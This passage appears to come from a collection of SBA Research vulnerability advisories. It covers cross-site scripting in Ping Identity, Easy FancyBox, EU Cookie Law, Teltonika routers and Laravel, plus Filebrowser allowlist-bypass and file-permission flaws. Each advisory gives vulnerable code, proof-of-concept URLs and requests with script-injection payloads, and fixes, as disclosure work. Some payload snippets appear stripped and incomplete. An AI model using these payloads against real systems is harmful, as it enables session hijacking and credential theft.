86 | * `2025-06-26` Fix released with version 2.33.9 87 | * `2025-06-26` Advisory published by project as `GHSA-rmwh-g367-mj4x` 88 | 89 | ## References ## 90 | 91 | * CWE-598: Use of GET Request Method With Sensitive Query Strings: 92 | * GitHub Security Advisory: 93 | 94 | ## Credits ## 95 | 96 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 97 | -------------------------------------------------------------------------------- /2019/SBA-ADV-20190305-01_Ping_Identity_Agentless_Integration_Kit_Reflected_XSS/README.md: -------------------------------------------------------------------------------- 1 | # Ping Identity Agentless Integration Kit Reflected Cross-site Scripting (XSS) # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Ping Identity Agentless Integration Kit before 1.5 is susceptible to 6 | Reflected Cross-site Scripting at the `/as/authorization.oauth2` 7 | endpoint due to improper encoding of an arbitrarily submitted HTTP 8 | GET parameter name. 9 | 10 | * **Identifier** : SBA-ADV-20190305-01 11 | * **Type of Vulnerability** : Cross-site Scripting 12 | * **Software/Product Name** : [Ping Identity Agentless Integration Kit](https://www.pingidentity.com/developer/en/resources/agentless-integration-kit-developers-guide.html) 13 | * **Vendor** : [Ping Identity](https://www.pingidentity.com/) 14 | * **Affected Versions** : < 1.5 15 | * **Fixed in Version** : 1.5 16 | * **CVE ID** : CVE-2019-13564 17 | * **CVSSv3 Vector** : AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 18 | * **CVSSv3 Base Score** : 6.1 (Medium) 19 | 20 | ## Vendor Description ## 21 | 22 | > After authenticating the user (via a federated security token or 23 | > authentication adapter), the user will be presented to the protected 24 | > application via an SP adapter. This adapter provides the last-mile 25 | > connection between the federation server (PingFederate) and the 26 | > application, the user will be presented to the application which can 27 | > then create a session and render the application for the 28 | > authenticated user. 29 | 30 | Source: 31 | 32 | ## Impact ## 33 | 34 | By exploiting the documented vulnerability, an attacker can execute 35 | JavaScript code in a victim's browser within the origin of the target 36 | site. This can be misused, for example, for phishing attacks by 37 | displaying a fake login form in the context of the trusted site via 38 | JavaScript and then sending the victim's credentials to the attacker. 39 | 40 | ## Vulnerability Description ## 41 | 42 | The `/as/authorization.oauth2` endpoint of PingFederate takes several 43 | HTTP GET parameter name-value pairs, which are subsequently rendered 44 | as an HTML form with hidden input fields. 45 | 46 | ```text 47 | https://idp.example.com/as/authorization.oauth2?response_type=code&client_id=CLIENT&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb 48 | ``` 49 | 50 | The name of the HTTP parameter is rendered as the `name` attribute of 51 | the corresponding input field, and the HTTP parameter value is rendered 52 | as the `value` attribute. The content of the `value` attribute is HTML- 53 | encoded and therefore not susceptible to XSS. However, the content of 54 | the `name` attribute is written to the HTML document without any 55 | encoding or sanitization. 56 | 57 | ## Proof of Concept ## 58 | 59 | An attacker can exploit this vulnerability by ending the HTML attribute 60 | and element and then inserting, for example, a `script` tag. 61 | 62 | ```text 63 | https://idp.example.com/as/authorization.oauth2?response_type=code&client_id=CLIENT&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb&%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E 64 | ``` 65 | 66 | The last parameter reads as follows when URL-decoded: 67 | 68 | ```html 69 | "> 70 | ``` 71 | 72 | This leads to the following HTML response (shortened for readability): 73 | 74 | ```html 75 |
76 | 77 | 78 | " value=""/> 79 | 80 |
81 | ``` 82 | 83 | ## Recommended Countermeasures ## 84 | 85 | We recommend to HTML-encode the parameter name the same way the 86 | parameter value is encoded. 87 | 88 | ## Timeline ## 89 | 90 | * `2019-03-05` Identified the vulnerability in version < 1.5 91 | * `2019-03-25` Contacted the vendor via support 92 | * `2019-05-24` Finding review with Ping Identity and SBA Research 93 | * `2019-07-11` Publication of CVE-2019-13564 94 | 95 | ## References ## 96 | 97 | * [NIST NVD entry of CVE-2019-13564](https://nvd.nist.gov/vuln/detail/CVE-2019-13564) 98 | 99 | ## Credits ## 100 | 101 | * Thomas Konrad ([SBA Research](https://www.sba-research.org/)) 102 | -------------------------------------------------------------------------------- /2019/SBA-ADV-20190911-01_Easy_FancyBox_WP_Plugin_Stored_XSS/README.md: -------------------------------------------------------------------------------- 1 | # Easy FancyBox Wordpress Plugin Stored Cross-site Scripting (XSS) # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The Easy FancyBox WordPress Plugin Version 1.8.17 is susceptible to Stored 6 | Cross-site Scripting in the Settings > Media admin page `/wp-admin/options-media.php` 7 | due to improper encoding of arbitrarily submitted setting parameters. The vulnerability 8 | affects every publicly accessible page of the WordPress site. 9 | 10 | * **Identifier** : SBA-ADV-20190911-01 11 | * **Type of Vulnerability** : Cross-site Scripting 12 | * **Software/Product Name** : [Easy FancyBox](https://wordpress.org/plugins/easy-fancybox/) 13 | * **Vendor** : [RavanH](https://status301.net/) 14 | * **Affected Versions** : <= 1.8.17 15 | * **Fixed in Version** : 1.8.18 16 | * **CVE ID** : CVE-2019-16524 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N 18 | * **CVSS Base Score** : 3.5 (Low) 19 | 20 | ## Vendor Description ## 21 | 22 | > Easy FancyBox plugin for WordPress websites gives you a flexible and 23 | > aesthetic light box solution for just about all media links on your website. 24 | > Easy FancyBox uses an updated version of the traditional FancyBox jQuery 25 | > extension and is WP 3+ Multi-Site compatible. After activation you can find 26 | > a new section FancyBox on your Settings > Media admin page where you can 27 | > manage the media light box options. 28 | 29 | Source: 30 | 31 | ## Impact ## 32 | 33 | By exploiting the documented vulnerability, an attacker can execute 34 | JavaScript code in a victim's browser within the origin of the target 35 | site. This can be misused, for example, by taking over future administrative 36 | web management sessions. 37 | 38 | ## Vulnerability Description ## 39 | 40 | Several parameters of the file `/inc/class-easyfancybox.php` are affected by 41 | stored cross-site scripting vulnerabilities. The file is a part of the 42 | Settings > Media admin page of the WordPress instance. 43 | 44 | These setting parameters are embedded in CSS blocks without encoding or 45 | sanitization, that are sent to the client's browser. The style sheet is sent 46 | along with every publicly accessible page, no matter if the plugin is needed 47 | on some pages or not. 48 | 49 | For example, the following parameters are vulnerable: 50 | 51 | * `/inc/class-easyfancybox.php` 52 | * fancybox_titleColor 53 | * fancybox_paddingColor 54 | 55 | There are many more vulnerable parameters, the above listed are given only as 56 | an example. 57 | 58 | The vulnerabilities are located in `/inc/class-easyfancybox.php`: 59 | 60 | ```php 61 | [...] 62 | if ( !empty($paddingColor) ) 63 | $content_style .= 'border-color:'.$paddingColor.';'; 64 | [...] 65 | if ( !empty($titleColor) ) 66 | $styles .= '#fancybox-title,#fancybox-title-float-main{color:'.$titleColor.'}'; 67 | [...] 68 | ``` 69 | 70 | As the above code snippet shows, the parameters `$paddingColor` and 71 | `$titleColor` contains user input and is concatenated into `$content_style` 72 | or respectively `$styles` without performing any sanitization or escaping. 73 | 74 | ## Proof of Concept ## 75 | 76 | An attacker can exploit this vulnerability by, firstly having access to the 77 | `Settings > Media page` within the administrative portal and secondly setting 78 | as `$titleColor` the following string: 79 | 80 | 81 | ```text 82 | #44} 83 | ``` 84 | 85 | This leads to the following HTML response (shortened for readability): 86 | 87 | ```html 88 | } 90 | 91 | ``` 92 | 93 | ## Recommended Countermeasures ## 94 | 95 | We recommend strictly whitelisting the user input before it is being used. The only 96 | allowed characters should be alphanumeric characters and the hash sign. 97 | 98 | ## Timeline ## 99 | 100 | * `2019-09-11` Identified the vulnerability in version 1.8.17 101 | * `2019-09-11` Contacted the vendor via support 102 | * `2019-09-16` Vendor closed the vulnerability in version 1.8.18 103 | * `2019-09-25` Publication of CVE-2019-16524 104 | 105 | ## References ## 106 | 107 | * [Easy Fancybox Plugin Page](https://wordpress.org/plugins/easy-fancybox/) 108 | 109 | ## Credits ## 110 | 111 | * Jakob Hagl ([SBA Research](https://www.sba-research.org/)) 112 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Command Execution Allowlist Bypass # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The *Command Execution* feature of Filebrowser only allows the execution of 6 | shell commands which have been predefined on a user-specific allowlist. The 7 | implementation of this allowlist is erroneous, allowing a user to execute 8 | additional commands not permitted. 9 | 10 | * **Identifier** : SBA-ADV-20250325-05 11 | * **Type of Vulnerability** : Remote Code Execution 12 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 13 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 14 | * **Affected Versions** : <= 2.33.9 15 | * **Fixed in Version** : 2.33.10 16 | * **CVE ID** : CVE-2025-52995 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 18 | * **CVSS Base Score** : 8.0 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > filebrowser provides a file managing interface within a specified directory 23 | > and it can be used to upload, delete, preview, rename and edit your files. 24 | > It allows the creation of multiple users and each user can have its own 25 | > directory. It can be used as a standalone app. 26 | 27 | Source: 28 | 29 | ## Impact ## 30 | 31 | A user can execute more shell commands than they are authorized for. The 32 | concrete impact of this vulnerability depends on the commands configured, and 33 | the binaries installed on the server or in the container image. Due to the 34 | missing separation of *scopes* on the OS-level, this could give an attacker 35 | access to all files managed the application, including the Filebrowser 36 | database. 37 | 38 | ## Vulnerability Description ## 39 | 40 | For a user to make use of the command execution feature, two things need to 41 | happen in advance: 42 | 43 | 1. An administrator needs to grant that account the `Execute commands` permission 44 | 2. The command to be executed needs to be listed in the `Commands` input 45 | field (also done by an administrator) 46 | 47 | If a user tries to execute a different command, it gets rejected by the application. 48 | 49 | The allowlist verification of a command happens in the function `CanExecute` 50 | in the file `users/users.go`: 51 | 52 | ```go 53 | // CanExecute checks if an user can execute a specific command. 54 | func (u *User) CanExecute(command string) bool { 55 | if !u.Perm.Execute { 56 | return false 57 | } 58 | 59 | for _, cmd := range u.Commands { 60 | if regexp.MustCompile(cmd).MatchString(command) { 61 | return true 62 | } 63 | } 64 | 65 | return false 66 | } 67 | ``` 68 | 69 | This check employs a regular expression which does not test if the command 70 | issued (`command`) is identical to a configured one (`cmd`, part of the array 71 | `u.Commands`) but rather only if the issued command contains an allowed one. 72 | This has the consequence, that, e.g., if you are only granted access to the 73 | `ls` command, you will also be allowed to execute `lsof` and `lsusb`. 74 | 75 | As a prerequisite, an attacker needs an account with the `Execute Commands` 76 | permission and some permitted commands. 77 | 78 | ## Proof of Concept ## 79 | 80 | Grant a user the `Execute commands` permission and allow them to use only 81 | `ls` in the `Commands` field: 82 | 83 | ![User setup](images/allowlistbypass_configuration.png) 84 | 85 | Afterwards, login as that user, open a command execution window and execute 86 | `lsof` and `lsusb`: 87 | 88 | ![Exploitation](images/allowlistbypass_exploit.png) 89 | 90 | ## Recommended Countermeasures ## 91 | 92 | The `CanExecute` function in the Filebrowser source code should be fixed to 93 | only allow exact matches of the command specified instead of doing partial 94 | matching. The correctness of this fix should be extensively tested in the 95 | application's automated test suite. 96 | 97 | ## Timeline ## 98 | 99 | * `2025-03-25` Identified the vulnerability in version 2.32.0 100 | * `2025-04-11` Contacted the project 101 | * `2025-04-18` Vulnerability disclosed to the project 102 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 103 | * `2025-06-26` CVE ID assigned by GitHub 104 | * `2025-06-26` Fix released with version 2.33.10 105 | * `2025-06-30` Advisory published by project as `GHSA-w7qc-6grj-w7r8` 106 | 107 | ## References ## 108 | 109 | * GitHub Security Advisory: 110 | 111 | ## Credits ## 112 | 113 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 114 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-03_Filebrowser_Insecure_File_Permissions/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Insecure File Permissions # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The file access permissions for files uploaded to or created from Filebrowser 6 | are never explicitly set by the application. The same is true for the 7 | database used by Filebrowser. On standard servers where the *umask* 8 | configuration has not been hardened before, this makes all the stated files 9 | readable by any operating system account. 10 | 11 | * **Identifier** : SBA-ADV-20250325-03 12 | * **Type of Vulnerability** : Incorrect Default Permissions 13 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 14 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 15 | * **Affected Versions** : <= 2.33.6 16 | * **Fixed in Version** : 2.33.7 17 | * **CVE ID** : CVE-2025-52900 18 | * **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 19 | * **CVSS Base Score** : 5.5 (Medium) 20 | 21 | ## Vendor Description ## 22 | 23 | > filebrowser provides a file managing interface within a specified directory 24 | > and it can be used to upload, delete, preview, rename and edit your files. 25 | > It allows the creation of multiple users and each user can have its own 26 | > directory. It can be used as a standalone app. 27 | 28 | Source: 29 | 30 | ## Impact ## 31 | 32 | The default permissions for new files on a standard Linux system are `0644`, 33 | making them world-readable. That means that at least the following parties 34 | have full read access to all files managed by the Filebrowser from all 35 | *scopes*, as well as its database (including the password hashes stored in 36 | there): 37 | 38 | * All OS accounts on the server 39 | * All other applications running on the same server 40 | * Any Filebrowser user with *Command Execution* privileges having access to a 41 | command that allows reading a file's content 42 | 43 | ## Vulnerability Description ## 44 | 45 | On a Linux system, the file access permissions of new files are designated by 46 | the system-wide *umask* setting, unless they are configured manually. Most 47 | distributions set this value to `022` by default which gives every account 48 | on the system read permissions on the file. 49 | 50 | ```bash 51 | $ umask 52 | 022 53 | $ touch foo 54 | $ ls -l foo 55 | -rw-r--r-- 1 sba sba 0 31. Mär 15:08 foo 56 | ``` 57 | 58 | ## Proof of Concept ## 59 | 60 | Upload or create a file in the Filebrowser GUI and list the directory 61 | contents from a shell: 62 | 63 | ```bash 64 | $ ls -l /srv/filebrowser/testdir 65 | total 12 66 | -rw-r--r-- 1 sba sba 7703 Mar 25 16:07 dummy1.pdf 67 | -rw-r--r-- 1 sba sba 3 Mar 25 15:46 testfile.txt 68 | ``` 69 | 70 | The same can be validated for Docker based deployments within the container: 71 | 72 | ```bash 73 | $ docker exec -it e0f075082a2c ls /srv/testdir -l 74 | total 12 75 | -rw-r--r-- 1 1000 1000 7703 Mar 25 15:07 dummy1.pdf 76 | -rw-r--r-- 1 1000 1000 3 Mar 25 14:46 testfile.txt 77 | ``` 78 | 79 | Furthermore, the database used by the Filebrowser application is readable by 80 | any account: 81 | 82 | ```bash 83 | $ ls -l /srv/filebrowser/filebrowser.db 84 | -rw-rw-r-- 1 sba sba 65536 Mar 25 09:58 /srv/filebrowser/filebrowser.db 85 | ``` 86 | 87 | ## Recommended Countermeasures ## 88 | 89 | Since the system's *umask* configuration cannot be controlled by the 90 | Filebrowser, the application needs to set the permissions of all new files 91 | manually upon creation. No permissions should be given to the *other* 92 | category. 93 | 94 | Implementing this won't fix the permissions for active instances after an 95 | update, so site administrators will need to fix the permissions manually: 96 | 97 | ```bash 98 | $ chmod o-rwx -R /srv/filebrowser/datadir 99 | ``` 100 | 101 | ## Timeline ## 102 | 103 | * `2025-03-25` Identified the vulnerability in version 2.32.0 104 | * `2025-04-11` Contacted the project 105 | * `2025-04-18` Vulnerability disclosed to the project 106 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 107 | * `2025-06-26` CVE ID assigned by GitHub 108 | * `2025-06-26` Fix released with version 2.33.7 109 | * `2025-06-26` Advisory published by project as `GHSA-jj2r-455p-5gvf` 110 | 111 | ## References ## 112 | 113 | * CWE-276: Incorrect Default Permissions: 114 | * What is Umask and How To Setup Default umask Under Linux?: 115 | * GitHub Security Advisory: 116 | 117 | ## Credits ## 118 | 119 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 120 | -------------------------------------------------------------------------------- /2019/SBA-ADV-20190913-01_WordPress_Plugin_EU_Cookie_Law/README.md: -------------------------------------------------------------------------------- 1 | # WordPress Plugin - EU Cookie Law (GDPR) - Stored XSS # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The eu-cookie-law plugin through 3.0.6 for WordPress (aka EU Cookie Law (GDPR)) 6 | is susceptible to Stored XSS due to improper encoding of several configuration 7 | options in the admin area and the displayed cookie consent message. 8 | This affects Font Color, Background Color, and the Disable Cookie text. 9 | An attacker with high privileges can attack other users. 10 | 11 | * **Identifier** : SBA-ADV-20190913-01 12 | * **Type of Vulnerability** : Cross-site Scripting 13 | * **Software/Product Name** : [EU Cookie Law (GDPR)](https://wordpress.org/plugins/eu-cookie-law/) 14 | * **Vendor** : [Alex Moss, Marco Milesi](https://wordpress.org/plugins/eu-cookie-law/) 15 | * **Affected Versions** : <= 3.0.6 and possibly upwards 16 | * **Fixed in Version** : - 17 | * **CVE ID** : CVE-2019-16522 18 | * **CVSSv3 Vector** : AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N 19 | * **CVSSv3 Base Score** : 3.5 (Low) 20 | 21 | ## Vendor Description ## 22 | 23 | > EU Cookie Law is a light, elegant and powerful solution to comply european cookie law and GDPR, with popup and options to lock scripts before acceptance. 24 | > 25 | > Various customizations included to perfectly fit your website and keep cookies under control (before and after the consent). 26 | > 27 | > Simply install the plugin and follow the instructions on the Settings page. 28 | 29 | Active Installations: 100,000+ 30 | 31 | Source: 32 | 33 | ## Impact ## 34 | 35 | By exploiting the documented vulnerability, an authenticated attacker with high 36 | privileges (admin) can execute JavaScript code in a victim's browser. 37 | This can be misused, e.g for phishing attacks by displaying a fake 38 | login form and sending the victim's credentials to the attacker. 39 | Furthermore malicious actions can be performed in the context of an authenticated 40 | user. The impact depends on the level of access of the attacked user. 41 | 42 | ## Vulnerability Description ## 43 | 44 | In the configuration area `/wp-admin/options-general.php?page=peadig_eucookie` 45 | an admin can set several options for the plugin. Most of them are correctly 46 | escaped before inserted in the HTML page. However three values of settings can 47 | be exploited to insert arbitrary JavaScript and HTML. 48 | Those are: 49 | 50 | * Font Color 51 | * Background Color 52 | * "Disable Cookie" Text 53 | 54 | The value of "Fontcolor" will be inserted on every page where the cookie consent message 55 | is shown. The other two are by default only exploitable in the admin area. 56 | 57 | ## Proof of Concept ## 58 | 59 | This example shows how an attacker can exploit this vulnerability through the 60 | value of "Font Color": By setting the value `#FFFFFF">`, 61 | an attacker can break out of the HTML attribute and insert a `script` tag containing 62 | JavaScript. In this example a simple alert-popup-box will be shown. 63 | 64 | So when the attacker sends the following HTTP-Request: 65 | 66 | ```http 67 | POST /wp-admin/options.php HTTP/1.1 68 | [...] 69 | 70 | [...]peadig_eucookie%5Bfontcolor%5D=%23FFFFFF%22%3E%3Cscript%3Ealert%281%29%3C/script%3E[...] 71 | ``` 72 | 73 | In the admin area, the resulting HTML page looks like the following (shortened for readability): 74 | 75 | ```html 76 | [...] 77 | 78 | 79 | " class="color-field" data-default-color="#ffffff"/> 80 | [...] 81 | ``` 82 | 83 | On the page with the cookie message the payload will be inserted multiple times. 84 | The resulting HTML looks like the following (shortened for readability): 85 | 86 | ```html 87 | [...] 88 | 89 |
90 | 91 | ;background:rgb(0,0,0);background: rgba(0,0,0,0.85);"> 92 | [...] 93 | ``` 94 | 95 | ## Recommended Countermeasures ## 96 | 97 | We recommend to escape the values using the `esc_attr`-[function][1] provided by WordPress. 98 | 99 | [1]: https://developer.wordpress.org/themes/theme-security/data-sanitization-escaping/#escaping-securing-output 100 | 101 | ## Timeline ## 102 | 103 | * `2019-09-04` Identified the vulnerability 104 | * `2019-09-06` Contacted the authors 105 | * `2019-09-06` Response by authors about disclosure contact 106 | * `2019-09-09` Disclosed vulnerability to the authors 107 | * `2019-09-20` CVE assigned 108 | * `2019-09-20` Asked authors again for fix 109 | * `2019-10-16` Public disclosure, because authors did not respond 110 | 111 | ## References ## 112 | 113 | * 114 | * 115 | 116 | ## Credits ## 117 | 118 | * Tobias Fink ([SBA Research](https://www.sba-research.org/)) 119 | -------------------------------------------------------------------------------- /2018/SBA-ADV-20180410-01_Teltonika_Cross_Site_Scripting/README.md: -------------------------------------------------------------------------------- 1 | # Teltonika RUT9XX Reflected Cross-Site Scripting (XSS) # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Teltonika RUT9XX routers with firmware before 00.05.01.1 are prone to 6 | cross-site scripting vulnerabilities in `hotspotlogin.cgi` due to 7 | insufficient user input sanitization. 8 | 9 | * **Identifier** : SBA-ADV-20180410-01 10 | * **Type of Vulnerability** : Cross Site Scripting 11 | * **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/) 12 | * **Vendor** : [Teltonika](https://teltonika.lt/) 13 | * **Affected Versions** : Firmware RUT9XX_R_00.05.00.5 and probably prior 14 | * **Fixed in Version** : RUT9XX_R_00.05.01.1 15 | * **CVE ID** : CVE-2018-17533 16 | * **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N 17 | * **CVSSv3 Base Score** : 8.2 (High) 18 | 19 | ## Vendor Description ## 20 | 21 | > RUT955 is a highly reliable and secure LTE router with I/O, GNSS and 22 | > RS232/RS485 for professional applications. Router delivers high 23 | > performance, mission-critical cellular communication and GPS location 24 | > capabilities. 25 | 26 | Source: 27 | 28 | ## Impact ## 29 | 30 | By exploiting the documented vulnerabilities, an attacker can execute 31 | JavaScript code in a user's browser within the origin of the router. 32 | The attacker might take over existing or future administrative web 33 | management sessions and gain access to the device. 34 | 35 | We recommend upgrading to version RUT9XX_R_00.05.01.1 or newer, which 36 | includes fixes for the vulnerabilities described in this advisory. 37 | 38 | ## Vulnerability Description ## 39 | 40 | Several parameters of the script `hotspotlogin.cgi` are affected by 41 | reflected cross-site scripting vulnerabilities. The scripts are part of 42 | the coova-chilli captive portal. However, in firmware versions before 43 | RUT9XX_R_00.04.233 the vulnerabilities are exploitable regardless of 44 | the device configuration, even if no captive portal is configured. 45 | 46 | More concretely, the following parameters are vulnerable: 47 | 48 | * `/cgi-bin/hotspotlogin.cgi` 49 | * *If* res=failed or res=notyet 50 | * challenge 51 | * uamip 52 | * uamport 53 | * userurl 54 | 55 | The affected script outputs these input parameters in an HTML context 56 | without proper output encoding. 57 | 58 | The vulnerabilities are located in `hotspotlogin.cgi`: 59 | 60 | ```lua 61 | [...] 62 | elseif result == 2 or result == 5 then 63 | replace_tags.formHeader = [[
64 | 65 | 66 | 67 | 68 | ]] 69 | replace_tags.formFooter = [[
]] 70 | [...] 71 | ``` 72 | 73 | As the above code snippet shows, the parameter `userurl` contains user 74 | input and is output without performing any HTML escaping. 75 | 76 | ## Proof-of-Concept ## 77 | 78 | An attacker can exploit this vulnerability by manipulating the `userurl` 79 | query parameter: 80 | 81 | ```text 82 | http:///cgi-bin/hotspotlogin.cgi?res=failed&userurl="> 90 | 91 | 92 | 93 | ``` 94 | 95 | ## Timeline ## 96 | 97 | * `2018-04-10` identification of vulnerability in version RUT9XX_R_00.04.161 98 | * `2018-04-16` re-test of version RUT9XX_R_00.04.172 99 | * `2018-04-16` initial vendor contact through public address 100 | * `2018-04-18` vendor response with security contact 101 | * `2018-04-19` disclosed vulnerability to vendor security contact 102 | * `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233 103 | * `2018-07-09` notify vendor about incomplete fix in version RUT9XX_R_00.05.00.5 104 | * `2018-07-19` vendor released fix in version RUT9XX_R_00.05.01.1 105 | * `2018-07-25` re-test of version RUT9XX_R_00.05.01.2 106 | * `2018-09-25` request CVE from MITRE 107 | * `2018-09-26` MITRE assigned CVE-2018-17533 108 | * `2018-10-11` public disclosure 109 | 110 | ## References ## 111 | 112 | * Firmware Changelog: 113 | 114 | ## Credits ## 115 | 116 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 117 | -------------------------------------------------------------------------------- /2024/SBA-ADV-20241209-02_Laravel_Reflected_XSS_via_Route_Parameter_in_Debug-Mode_Error_Page/README.md: -------------------------------------------------------------------------------- 1 | # Laravel Reflected XSS via Route Parameter in Debug-Mode Error Page # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible 6 | to reflected cross-site scripting due to an improper encoding of route 7 | parameters in the debug-mode error page. 8 | 9 | * **Identifier** : SBA-ADV-20241209-02 10 | * **Type of Vulnerability** : Cross-Site Scripting 11 | * **Software/Product Name** : [Laravel Framework](https://github.com/laravel/framework) 12 | * **Vendor** : [Laravel Holdings Inc.](https://laravel.com/) 13 | * **Affected Versions** : between 11.9.0 and 11.35.1 14 | * **Fixed in Version** : 11.36.0 15 | * **CVE ID** : CVE-2024-13919 16 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N 17 | * **CVSS Base Score** : 8.0 (High) 18 | 19 | ## Vendor Description ## 20 | 21 | > Laravel is a web application framework with expressive, elegant syntax. 22 | 23 | Source: 24 | 25 | ## Impact ## 26 | 27 | This vulnerability allows attackers to execute JavaScript code in a user's 28 | browser within the origin of the affected web application. The user needs to 29 | access the attacker provided link and the web application needs to be in 30 | debug-mode (`APP_DEBUG=true`). 31 | 32 | ## Vulnerability Description ## 33 | 34 | When the debug mode is active via `APP_DEBUG=true` and the web application 35 | returns an error (HTTP status 5XX), an error page is returned. This page 36 | contains information about the request that triggered the error. The values 37 | in the URL path are embedded in the error page without proper encoding. 38 | 39 | The following code snippet shows the sink. The templating engine deactivates 40 | HTML-encoding for data passed via `{!! !!}`. 41 | 42 | ```html 43 |
44 |
45 | 49 | 
{!! $routeParametersContext !!}
50 | 51 |
52 |
53 | ``` 54 | 55 | ## Proof of Concept ## 56 | 57 | ### Prerequisites ### 58 | 59 | First, let us make sure that the debug mode is activated ensuring that 60 | `APP_DEBUG=true` is set in the `.env` file. Second, add an endpoint that 61 | produces an error, e.g., division by zero. 62 | 63 | ```php 64 | 86 | 87 | 
 88 |       {
 89 | "id": ""
 90 | }
 91 |
92 | 93 |
94 | ``` 95 | 96 | As the `id` value is not embedded with proper encoding, the browser 97 | interprets it as HTML, executes the injected JavaScript code and, therefore, 98 | opens an alert. 99 | 100 | ## Recommended Countermeasures ## 101 | 102 | If possible upgrade to the fixed version 11.36.0 or above. 103 | If you are unable to upgrade, ensure that the application does not run in 104 | debug-mode by setting `APP_DEBUG=false` in your configuration. 105 | 106 | ## Timeline ## 107 | 108 | * `2024-11-28` Identified the vulnerability in version 11.34.1 109 | * `2024-12-09` Initial contact attempt and disclosure of vulnerability to 110 | Laravel's security contact 111 | * `2024-12-13` Security patch was merged 112 | * `2024-12-14` Contacted Jeremy Angele (@angelej) who independently 113 | discovered the vulnerability and submitted the patch to fix it 114 | * `2024-12-17` Laravel project releases fixed version 11.36.0 115 | * `2025-02-05` Second attempt to contact Laravel's security contact 116 | * `2025-03-10` No reaction from Laravel's security contact to all previous 117 | contact attempts 118 | * `2025-03-10` SBA Research assigned CVE-2024-13919 119 | * `2025-03-10` Public disclosure 120 | 121 | ## References ## 122 | 123 | * Security Patch: 124 | 125 | ## Credits ## 126 | 127 | * Fabian Funder ([SBA Research](https://www.sba-research.org/)) 128 | * Philipp Adelsberger ([SBA Research](https://www.sba-research.org/)) 129 | -------------------------------------------------------------------------------- /2024/SBA-ADV-20241209-01_Laravel_Reflected_XSS_via_Request_Parameter_in_Debug-Mode_Error_Page/README.md: -------------------------------------------------------------------------------- 1 | # Laravel Reflected XSS via Request Parameter in Debug-Mode Error Page # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible 6 | to reflected cross-site scripting due to an improper encoding of request 7 | parameters in the debug-mode error page. 8 | 9 | * **Identifier** : SBA-ADV-20241209-01 10 | * **Type of Vulnerability** : Cross-Site Scripting 11 | * **Software/Product Name** : [Laravel Framework](https://github.com/laravel/framework) 12 | * **Vendor** : [Laravel Holdings Inc.](https://laravel.com/) 13 | * **Affected Versions** : between 11.9.0 and 11.35.1 14 | * **Fixed in Version** : 11.36.0 15 | * **CVE ID** : CVE-2024-13918 16 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N 17 | * **CVSS Base Score** : 8.0 (High) 18 | 19 | ## Vendor Description ## 20 | 21 | > Laravel is a web application framework with expressive, elegant syntax. 22 | 23 | Source: 24 | 25 | ## Impact ## 26 | 27 | This vulnerability allows attackers to execute JavaScript code in a user's 28 | browser within the origin of the affected web application. The user needs to 29 | access the attacker provided link and the web application needs to be in 30 | debug-mode (`APP_DEBUG=true`). 31 | 32 | ## Vulnerability Description ## 33 | 34 | When the debug mode is active via `APP_DEBUG=true` and the web application 35 | returns an error (HTTP status 5XX), an error page is returned. This page 36 | contains information about the request that triggered the error. The values 37 | in the URL parameters and in the request body are embedded in the error page 38 | without proper encoding. 39 | 40 | The following code snippet shows the sink. The templating engine deactivates 41 | HTML-encoding for data passed via `{!! !!}`. 42 | 43 | ```html 44 |
45 |
46 | 50 | 
{!! $exception->requestBody() ?: 'No body data' !!}
51 | 52 |
53 |
54 | ``` 55 | 56 | ## Proof of Concept ## 57 | 58 | ### Prerequisites ### 59 | 60 | First, let us make sure that the debug mode is activated ensuring that 61 | `APP_DEBUG=true` is set in the `.env` file. Second, add an endpoint that 62 | produces an error, e.g., division by zero. 63 | 64 | ```php 65 | alert(1)` the 81 | `poc-url` function is executed, a division by zero exception is thrown, 82 | causing the webserver to respond with a `500 Internal Server Error`. An 83 | error page is generated containing the following HTML code. 84 | 85 | ```html 86 |
87 | 88 | 
 89 |       {
 90 | "payload": ""
 91 | }
 92 |
93 | 94 |
